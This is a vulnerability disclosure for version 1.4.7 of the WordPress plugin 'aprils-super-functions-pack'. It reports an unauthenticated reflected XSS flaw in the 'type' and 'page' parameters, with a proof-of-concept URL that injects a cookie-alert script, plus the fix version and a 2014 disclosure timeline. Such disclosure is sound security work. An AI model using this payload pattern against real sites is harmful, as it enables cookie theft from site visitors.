wp-plugin : aprils-super-functions-pack

Plugin Details
Plugin Name: wp-plugin : aprils-super-functions-pack
Effected Version : 1.4.7 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
 http://localhost/wp-content/plugins/aprils-super-functions-pack/readme.php?type=type"><script>alert(document.cookie)</script>&page=page"><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : page, type

 

Type of XSS : Reflected

 

Fixed in : 1.4.8

 

Trac Changelog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833934%40aprils-super-functions-pack&old=742940%40aprils-super-functions-pack&sfp_email=&sfph_mail=


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on 2014-01-06
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[| This plugin contains a large number of shortcodes that makes it easy to lay out text on your site in more exciting ways than simply paragraphs, headers, and lists. There are also some template functions and useful javascript that theme developers may find useful. Shortcodes: * Columns - 2, 3, or 4 * Boxes with particular color, height, title * Tabs (js-driven) * Expand/Hide (js-driven) * Buttons and icons * Pull-quotes * Dropcaps * ... and more Other Functions: * Template function for displaying pages 'in the current section' * Template function for displaying the image that belongs to a post * JS to remove 'title' tags from WP-generated menus * JS to allow pre-selecting a recipient from certain CForms forms * JS to make suckerfish menus work in IE Widgets: * A replacement Text widget that lets you specify a class ]